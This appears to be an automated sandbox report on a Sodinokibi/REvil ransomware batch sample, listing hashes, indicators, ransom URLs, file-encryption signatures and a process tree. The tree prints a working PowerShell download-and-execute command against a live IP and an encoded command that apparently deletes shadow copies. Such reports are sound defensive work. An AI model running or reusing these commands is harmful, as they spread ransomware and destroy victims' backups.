Analysis
- max time kernel: 126s
- max time network: 128s
- platform: windows10_x64
- resource: win10
- submitted: 15-08-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
  Resource: win10
General
- Target: df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat
- Size: 222B
- MD5: 19b3b3791a8bb6e48fca9c29132a649e
- SHA1: b03af91b377f63ab4d6c236a7f942643aa66498f
- SHA256: 4167595a02a41357a7cb611b831f74f802ce747c124913fefe76789babbf1c40
- SHA512: f2e3d44f22f21c2a5d24013772ec273c510fc76ab32e6586125c22d968886198d2225138570153385fb94b06f0360e13a59fd7fe33fef2aa3c447e25554eac42
Malware Config
Extracted
http://185.103.242.78/pastes/df9ae1ee4f2b0aa1f7a2e70779f9dbd4
Extracted
C:\z795dq-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3FB5F5D0526F17E3
http://decryptor.cc/3FB5F5D0526F17E3
Signatures
- Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Blacklisted process makes network request (1 IoCs)
  Processes:
  flow | pid  | process
  3    | 3228 | powershell.exe
- Modifies extensions of user files (8 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes:
  description  | ioc | process
  File renamed | C:\Users\Admin\Pictures\RestoreConnect.raw => \??\c:\users\admin\pictures\RestoreConnect.raw.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\StartEdit.raw => \??\c:\users\admin\pictures\StartEdit.raw.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\WriteClear.crw => \??\c:\users\admin\pictures\WriteClear.crw.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\StopUndo.tif => \??\c:\users\admin\pictures\StopUndo.tif.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\EnterConnect.crw => \??\c:\users\admin\pictures\EnterConnect.crw.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\PushSet.png => \??\c:\users\admin\pictures\PushSet.png.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ReadUnlock.crw => \??\c:\users\admin\pictures\ReadUnlock.crw.z795dq | powershell.exe
  File renamed | C:\Users\Admin\Pictures\RemoveExpand.tif => \??\c:\users\admin\pictures\RemoveExpand.tif.z795dq | powershell.exe
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes:
  description     | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\jhoe5uxgtk.bmp" | powershell.exe
- Drops file in Program Files directory (13 IoCs)
  Processes:
  description                  | ioc | process
  File opened for modification | \??\c:\program files\CompressRestart.mpp | powershell.exe
  File opened for modification | \??\c:\program files\SwitchRepair.vb | powershell.exe
  File opened for modification | \??\c:\program files\UnregisterWatch.txt | powershell.exe
  File created                 | \??\c:\program files\z795dq-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\BackupUnregister.ADTS | powershell.exe
  File opened for modification | \??\c:\program files\ResolveUpdate.xlsb | powershell.exe
  File opened for modification | \??\c:\program files\StepPop.wvx | powershell.exe
  File opened for modification | \??\c:\program files\StopUninstall.tiff | powershell.exe
  File opened for modification | \??\c:\program files\SuspendDismount.xml | powershell.exe
  File opened for modification | \??\c:\program files\SwitchUnblock.dot | powershell.exe
  File opened for modification | \??\c:\program files\UseShow.wps | powershell.exe
  File created                 | \??\c:\program files (x86)\z795dq-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\NewEnable.xlsx | powershell.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes:
  pid  | process
  3228 | powershell.exe
  3228 | powershell.exe
  3228 | powershell.exe
  3228 | powershell.exe
  3228 | powershell.exe
  2696 | powershell.exe
  2696 | powershell.exe
  2696 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes:
  description                     | pid  | process
  Token: SeDebugPrivilege         | 3228 | powershell.exe
  Token: SeDebugPrivilege         | 3228 | powershell.exe
  Token: SeDebugPrivilege         | 2696 | powershell.exe
  Token: SeBackupPrivilege        | 3904 | vssvc.exe
  Token: SeRestorePrivilege       | 3904 | vssvc.exe
  Token: SeAuditPrivilege         | 3904 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 3228 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
  description                      | pid  | process        | target process
  PID 3832 wrote to memory of 3228 | 3832 | cmd.exe        | powershell.exe
  PID 3832 wrote to memory of 3228 | 3832 | cmd.exe        | powershell.exe
  PID 3832 wrote to memory of 3228 | 3832 | cmd.exe        | powershell.exe
  PID 3228 wrote to memory of 2696 | 3228 | powershell.exe | powershell.exe
  PID 3228 wrote to memory of 2696 | 3228 | powershell.exe | powershell.exe
  PID 3228 wrote to memory of 2696 | 3228 | powershell.exe | powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\df9ae1ee4f2b0aa1f7a2e70779f9dbd4.bat"
  Signatures: Suspicious use of WriteProcessMemory
  PID: 3832
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df9ae1ee4f2b0aa1f7a2e70779f9dbd4');Invoke-DWFHDKTAJZTPUIQ;Start-Sleep -s 10000"
    Signatures: Blacklisted process makes network request; Modifies extensions of user files; Sets desktop wallpaper using registry; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    PID: 3228
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 2696
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Modifies service; Suspicious use of AdjustPrivilegeToken
  PID: 3904